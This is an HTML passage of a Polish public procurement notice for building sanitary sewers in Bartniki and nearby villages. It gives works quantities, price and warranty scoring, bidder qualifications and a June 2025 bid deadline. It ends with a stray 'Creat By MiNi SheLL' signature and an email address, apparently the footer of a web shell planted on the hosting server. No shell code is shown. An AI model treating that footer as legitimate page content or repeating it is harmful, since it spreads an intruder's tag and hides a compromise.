gwarancji, tylko te okresy będą podlegać punktacji,<br/>e)	jeżeli Wykonawca w formularzu ofertowym nie poda okresu gwarancji jakości, Zamawiający odrzuci taką ofertę na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp jako niezgodną z treścią SWZ,<br/>f)	jeżeli Wykonawca poda w formularzu oferty okres gwarancji jakości poniżej 36 miesięcy, Zamawiający odrzuci taką ofertę na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp jako niezgodną z treścią SWZ,<br/>g)	jeżeli Wykonawca poda inny okres gwarancji niż wskazany przez Zamawiającego, wówczas Zamawiający nie przyzna punktów w tym kryterium,<br/>h)	dla ofert których okres gwarancji jakości będzie dłuższy niż 60 miesięcy, dla celów oceny ofert przyjęty zostanie okres gwarancji równy 60 miesięcy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ II zamówienia pn.: „Budowa sieci kanalizacji sanitarnej w miejscowości Bartniki”, obejmuje następujący zakres rzeczowy:<br/>2.1.	Budowę sieci kanalizacji sanitarnej w miejscowości Bartniki, w obrębie działek prywatnych o nr ew. 315, 313/1, 312, 572, 310, 309, 308/1, 307, 306, 305, 304, 303, 316, 302, 440, 439, 437, 435, 433, 573, 428. 426/1, 426/2, 424, 422, 420, 418, 416, 414, 412, 410, 408, 406, 404, 402, położonych wzdłuż drogi powiatowej nr 4718W – ul. Miodowej, położonej na działce nr ew. 379.<br/>Zakres prac podstawowych związanych z budową sieci kanalizacji sanitarnej obejmuje:<br/>a)	budowa kanału z rur kanalizacyjnych PE, o połączeniach zgrzewanych, o średnicy zewnętrznej 200 mm metodą przecisku sterowanego, w ilości 489,00 m;<br/>b)	budowa odcinków przyłączeniowych z rur kanalizacyjnych o wydłużonych kielichach i pierścieniach stabilizujących PVC typu ciężkiego, o średnicy zewnętrznej 160 mm łączonych na wcisk, w ilości 44,00 m;<br/>c)	budowa studni rewizyjnych PE, PP o średnicy 1000 mm z pierścieniem odciążającym i włazem drogowym dn. 600 mm typ ciężki, w ilości 13 szt.;<br/>d)	budowa studni rewizyjnych przyłączeniowych PE, PP o średnicy 200 mm, w ilości 28 szt.;<br/>e)	montaż trójników PVC o średnicy zewnętrznej 200 mm łączonych na wcisk, w ilości 58 szt.;<br/>f)	montaż korków i kolan PVC o średnicy zewnętrznej 160 mm łączonych na wcisk, w ilości 112 szt.;<br/>g)	rozebranie i ponowne ułożenie nawierzchni z kostki betonowej, w ilości 129,00 m2;<br/>h)	wykonanie nawierzchni z kamienia tłuczonego – warstwa gr. 10 cm, w ilości 165,00 m2.<br/>2.2.	Budowę sieci kanalizacji sanitarnej w miejscowości Bartniki, w obrębie działek prywatnych o nr ew. 341, 340, 339, 338, 337, 336/2, 335, 332, 331, 330, 1318/10, 1318/9, 325, 324/2, 322/3, 322/2, 320/1, 320/2, 319, 318, 317, 316, 484, 482, 480, 478, 474, 472, 469. 467, 463, 461, 459, 455, 453, 451, 449, 446, 443/1, 443/2, 440, położonych wzdłuż drogi powiatowej nr 4718W – ul. Miodowej, położonej na działce nr ew. 379.<br/>Zakres prac podstawowych związanych z budową sieci kanalizacji sanitarnej obejmuje:<br/>a)	budowa kanału z rur kanalizacyjnych PE, o połączeniach zgrzewanych, o średnicy zewnętrznej 200 mm metodą przecisku sterowanego, w ilości 701,00 m;<br/>b)	budowa odcinków przyłączeniowych z rur kanalizacyjnych o wydłużonych kielichach i pierścieniach stabilizujących PVC typu ciężkiego, o średnicy zewnętrznej 160 mm łączonych na wcisk, w ilości 58,00 m;<br/>c)	budowa studni rewizyjnych PE, PP o średnicy 1000 mm z pierścieniem odciążającym i włazem drogowym dn. 600 mm typ ciężki, w ilości 14 szt.;<br/>d)	budowa studni rewizyjnych przyłączeniowych PE, PP o średnicy 200 mm, w ilości 30 szt.;<br/>e)	montaż trójników PVC o średnicy zewnętrznej 200 mm łączonych na wcisk, w ilości 58 szt.;<br/>f)	montaż korków i kolan PVC o średnicy zewnętrznej 160 mm łączonych na wcisk, w ilości 130 szt.;<br/>g)	rozebranie i ponowne ułożenie nawierzchni z kostki betonowej, w ilości 145,00 m2;<br/>h)	wykonanie nawierzchni z kamienia tłuczonego – warstwa gr. 10 cm, w ilości 180,00 m2.<br/>2.3.	Budowa sieci kanalizacji sanitarnej w miejscowości Bartniki, w obrębie działek prywatnych o nr ew. 498, 346/3, 346/1, 348/1, 352/3, położonych wzdłuż drogi powiatowej nr 4718W – ul. Miodowej, wraz z przejściem kanalizacji pod drogą powiatową położoną na działce nr ew. 379.<br/>Zakres prac podstawowych związanych z budową sieci kanalizacji sanitarnej obejmuje:<br/>a)	budowa kanału z rur kanalizacyjnych PE, o połączeniach zgrzewanych, o średnicy zewnętrznej 200 mm metodą przecisku, w ilości 58,00 m;<br/>b)	budowa odcinków przyłączeniowych z rur kanalizacyjnych o wydłużonych kielichach i pierścieniach stabilizujących PVC typu ciężkiego, o średnicy zewnętrznej 160 mm łączonych na wcisk, w ilości 6,00 m;<br/>c)	wykonanie przecisku z rury stalowej o średnicy 250 mm pod drogą powiatową, w ilości 15,00 m;<br/>d)	budowa studni rewizyjnej PE, PP o średnicy 1000 mm z pierścieniem odciążającym i włazem drogowym dn. 600 mm typ ciężki, w ilości 1 szt.;<br/>e)	budowa studni rewizyjnych przyłączeniowych PE, PP o średnicy 200 mm, w ilości 3 szt.;<br/>f)	montaż trójników PVC o średnicy zewnętrznej 200 mm łączonych na wcisk, w ilości 2 szt.;<br/>g)	montaż korków i kolan PVC o średnicy zewnętrznej 160 mm łączonych na wcisk, w ilości 6 szt.<br/>Szczegółowy zakres rzeczowy przedmiotu zamówienia dla CZĘŚCI II określają: projekty budowlane stanowiące załączniki nr 7e, 7f i 7g do SWZ, projekty techniczne stanowiące załączniki nr 8e, 8f i 8g do SWZ, Specyfikacje Techniczne (STWIOR) stanowiące załącznik nr 9efg do SWZ, przedmiary robót stanowiące załączniki nr 10e, 10f i 10g do SWZ oraz opinie geotechniczne stanowiące załączniki 11ef i 11g do SWZ.<br/>Wykonawca zobowiązany jest zrealizować zamówienie dla CZĘŚCI II na zasadach i warunkach określonych we wzorze umowy stanowiącym Załącznik nr 6b do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233142-6 - Roboty w zakresie naprawy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty, Zamawiający będzie się kierował następującymi kryteriami oceny ofert dla każdej CZĘŚCI zamówienia oddzielnie:<br/>Kryterium nr 1 – Cena oferty brutto (C) – waga kryterium 60%,<br/>Kryterium nr 2 – Okres gwarancji (G) – waga kryterium 40%.<br/>2.	Zasady oceny ofert w poszczególnych kryteriach:<br/><br/>1)	Kryterium nr 1 – Cena oferty brutto (C) – waga 60%<br/>Punkty obliczane będą następująco:<br/><br/>C = cena najniższa brutto* / cena oferty ocenianej brutto x 100 pkt x 60%<br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a)	Podstawą przyznania punktów w kryterium „Cena oferty brutto”, będzie cena ofertowa brutto podana przez Wykonawcę w „Formularzu ofertowym”.<br/>b)	Cena oferty brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>c)	Liczba punktów możliwych do uzyskania – 60.<br/><br/>2)	Kryterium nr 2 – Okres gwarancji (G) – waga 40%<br/>Ocena oferty w kryterium gwarancji jakości wyrażona jest w punktach, które liczone będą następująco:<br/>a)	w ramach Kryterium nr 2, Zamawiający może przyznać maksymalnie 40 punktów,<br/>b)	za zadeklarowany przez wykonawcę okres gwarancji w swojej ofercie, Wykonawca otrzyma następującą punktację:<br/>36 miesięcy – 0 pkt<br/>48 miesięcy – 20 pkt<br/>60 miesięcy – 40 pkt<br/>c)	Wykonawca w formularzu ofertowym podaje okres gwarancji w pełnych miesiącach,<br/>d)	Wykonawca w formularzu ofertowym wpisuje jeden z wyżej wymienionych okresów gwarancji, tylko te okresy będą podlegać punktacji,<br/>e)	jeżeli Wykonawca w formularzu ofertowym nie poda okresu gwarancji jakości, Zamawiający odrzuci taką ofertę na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp jako niezgodną z treścią SWZ,<br/>f)	jeżeli Wykonawca poda w formularzu oferty okres gwarancji jakości poniżej 36 miesięcy, Zamawiający odrzuci taką ofertę na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp jako niezgodną z treścią SWZ,<br/>g)	jeżeli Wykonawca poda inny okres gwarancji niż wskazany przez Zamawiającego, wówczas Zamawiający nie przyzna punktów w tym kryterium,<br/>h)	dla ofert których okres gwarancji jakości będzie dłuższy niż 60 miesięcy, dla celów oceny ofert przyjęty zostanie okres gwarancji równy 60 miesięcy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.1.	Dla CZĘŚCI I zamówienia pn.: „Budowa sieci kanalizacji sanitarnej w miejscowościach Długokąty i Radziwiłłów”.<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny;<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny;<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny;<br/>4)	zdolności technicznej lub zawodowej:<br/>Zamawiający uzna wyżej wymieniony warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich (5) pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje należycie co najmniej 2 roboty budowlane polegające na budowie kanalizacji sanitarnej, przy czym wartość każdej roboty budowlanej wynosić musi co najmniej 500 000,00 zł brutto.<br/>W celu wykazania spełniania powyższego warunku, Wykonawca składa wykaz wykonanych robót budowlanych, stanowiący Załącznik nr 5 do SWZ. Roboty budowlane powinny być wykonane, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywane należycie w okresie ostatnich (5) pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których roboty budowlane zostały wykonane lub są wykonywane. Do wykazu należy załączyć dowody potwierdzające, że wymienione roboty budowlane zostały wykonane należycie, w szczególności referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych, referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie, powinny być wystawione w okresie ostatnich 3 miesięcy przed upływem terminu składania ofert. <br/>1.2.	Dla CZĘŚCI II zamówienia pn.: „Budowa sieci kanalizacji sanitarnej w miejscowości Bartniki”.<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny;<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny;<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny;<br/>4)	zdolności technicznej lub zawodowej:<br/>Zamawiający uzna wyżej wymieniony warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich (5) pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje należycie co najmniej 2 roboty budowlane polegające na budowie kanalizacji sanitarnej, przy czym wartość każdej roboty budowlanej wynosić musi co najmniej 500 000,00 zł brutto.<br/>W celu wykazania spełniania powyższego warunku, Wykonawca składa wykaz wykonanych robót budowlanych, stanowiący Załącznik nr 5 do SWZ. Roboty budowlane powinny być wykonane, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywane należycie w okresie ostatnich (5) pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których roboty budowlane zostały wykonane lub są wykonywane. Do wykazu należy załączyć dowody potwierdzające, że wymienione roboty budowlane zostały wykonane należycie, w szczególności referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych, referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie, powinny być wystawione w okresie ostatnich 3 miesięcy przed upływem terminu składania ofert.<br/>2.	Dotyczy każdej Części zamówienia:<br/>2.1.	Wykonawca, który złoży ofertę na każdą CZĘŚĆ zamówienia może posługiwać się tymi samymi referencjami (protokołami odbioru itp.) w odniesieniu do każdej z części zamówienia, o ile dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu opisane w ppkt 1.1. 4) i 1.2. 4). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Podmiotowe środki dowodowe wymagane od Wykonawcy dla CZĘŚCI I i II zamówienia obejmują:<br/>2)	w celu potwierdzenia braku podstaw wykluczenia, określonych w Rozdziale XSWZ, Wykonawca zobowiązany jest do złożenia na wezwanie Zamawiającego następujących dokumentów:<br/>a)	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2024 r. poz. 1616), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – Załącznik nr 4 do SWZ;<br/>b)	odpis lub informacja z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe wymagane od Wykonawcy dla CZĘŚCI I i II zamówienia obejmują:<br/>1)	w celu potwierdzenia spełniania warunków udziału w postępowaniu, określonych w Rozdziale IX SWZ, Wykonawca zobowiązany będzie do złożenia na wezwanie Zamawiającego następujących dokumentów:<br/>a)	wykaz wykonanych robót budowlanych, potwierdzający spełnianie warunku dla CZĘŚCI I zamówienia, określonego w rozdziale IX pkt 1 ppkt 1.1.4) SWZ i dla CZĘŚCI II zamówienia, określonego w rozdziale IX pkt 1 ppkt 1.2.4) SWZ. <br/>Zamawiający uzna wyżej wymieniony warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich (5) pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje należycie co najmniej 2 roboty budowlane polegające na budowie kanalizacji sanitarnej, przy czym wartość każdej roboty budowlanej wynosić musi co najmniej 500 000,00 zł brutto.<br/>W celu wykazania spełniania powyższego warunku, Wykonawca składa wykaz wykonanych robót budowlanych, stanowiący Załącznik nr 5 do SWZ dla danej CZĘŚCI zamówienia wskazanej w wezwaniu Zamawiającego. Roboty budowlane powinny być wykonane, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywane należycie w okresie ostatnich (5) pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których roboty budowlane zostały wykonane lub są wykonywane. Do wykazu należy załączyć dowody potwierdzające, że wymienione roboty budowlane zostały wykonane należycie, w szczególności referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych, referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie, powinny być wystawione w okresie ostatnich 3 miesięcy przed upływem terminu składania ofert.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale XI ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy – Załącznik nr 13 do SWZ.<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we „Wzorach umowy”, stanowiące Załącznik nr 6a i 6b do SWZ.<br/>2.	Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 Pzp oraz określonych we „Wzorach umów”, stanowiące Załącznik nr 6a i 6b do SWZ.<br/>4.	Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-13 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/1118537</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-13 09:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com